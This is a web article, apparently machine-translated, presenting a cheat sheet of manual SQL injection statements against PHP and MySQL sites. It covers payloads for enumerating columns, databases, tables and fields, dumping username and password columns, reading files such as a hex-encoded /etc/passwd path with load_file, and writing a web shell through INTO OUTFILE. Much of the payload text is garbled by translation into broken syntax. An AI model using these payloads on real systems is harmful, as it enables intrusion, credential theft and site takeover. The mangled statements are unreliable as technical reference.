Get the App
SLTechnology News&Howtos  ›  Servers  › 

What are the manual injection statements of PHP+MySQL

Shulou Source: shulou.com Published: 2022-06-01 02:19:50 09月22日 Update

This article will explain in detail what are the manual injection sentences about PHP+MySQL. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.

Burst field length

Order by num/*

Matching field

And 1, 1 union select, 1, 2, 3, 4, 5. .n / *

Storm field location

And 1pm 2 union select 1pm 2pm 3pm 4pm 5... .. nswap *

Using built-in functions to expose database information

Version () database () user ()

There is no need to guess the available field burst database information (some websites are not applicable):

And 1: 2 union all select version () / *

And 1: 2 union all select database () / *

And 1: 2 union all select user () / *

Operating system information:

And 1: 2 union all select @ @ global.version_compile_os from mysql.user / *

Database permissions:

And ord (mid (user (), 1Power1)) = 114 / * return normal description as root

Burst database (mysql > 5.0)

Mysql 5 and above have a built-in library information_schema, which stores all the database and table structure information of mysql.

And 1 people 2 union select 1 from information_schema.SCHEMATA limit 2 people 3 from information_schema.SCHEMATA limit Magi SCHEMAO name 1, 5, 6, 7, 8, 9, 10, and 0.

Guess the table

And 1 recording 2 union select 1 union select 2 limit 3 limit 5, 6, 7, 8, 9, 10, 10, database (hexadecimal) limit 0 (initial record, 0 is the first starting record), 1 (shows 1 record)-

Guess field

And 1 from information_schema. 2 Union select 1 Union select 2 limit 3 limit 0 where TABLE_NAME= 5, 6, 7, 8, 9, 10, and where TABLE_NAME= table name (hex)

Violent password

And 1 minute 2 Union select 1 from 2 from 3, user name segment, 5 mine6 Magi 7, password segment, 8 mine9 from table name limit 0 Magi 1

Advanced usage (one available field displays two data contents):

Union select 1 from 2 from 3 concat (user name segment, 0x3c, password segment), 5, 6, 7, 7, 7, 7, and table name limit 0 concat 1

Write horse directly (Root permission)

Conditions: 1. Know the physical path of the site

2. Have enough permissions (you can use select … . From mysql.user test)

3. Magic_quotes_gpc () = OFF

Select''into outfile' physical path'

And 1: 2 union all select: HEX value into outfile 'path'

Common paths for load_file ():

1. Replace (load_file (0×2F6574632F706173737764), 0 × 3c, 0 × 20)

2. Replace (load_file (char (47 ~ 101 ~ 116 ~ 99 ~ 99), char (60), char (32))

The above two are to view a PHP file that fully displays the code. Sometimes some characters are not replaced, such as "

Tags: Fields data database information paths passwords permissions articles manual statements two code content hexadecimal name fields more physics users good practical Apple Docker Huawei Linux macOS MariaDB Microsoft MySQL NVidia OPPO Reno Apple Shulou Technology vpn Docker Microsoft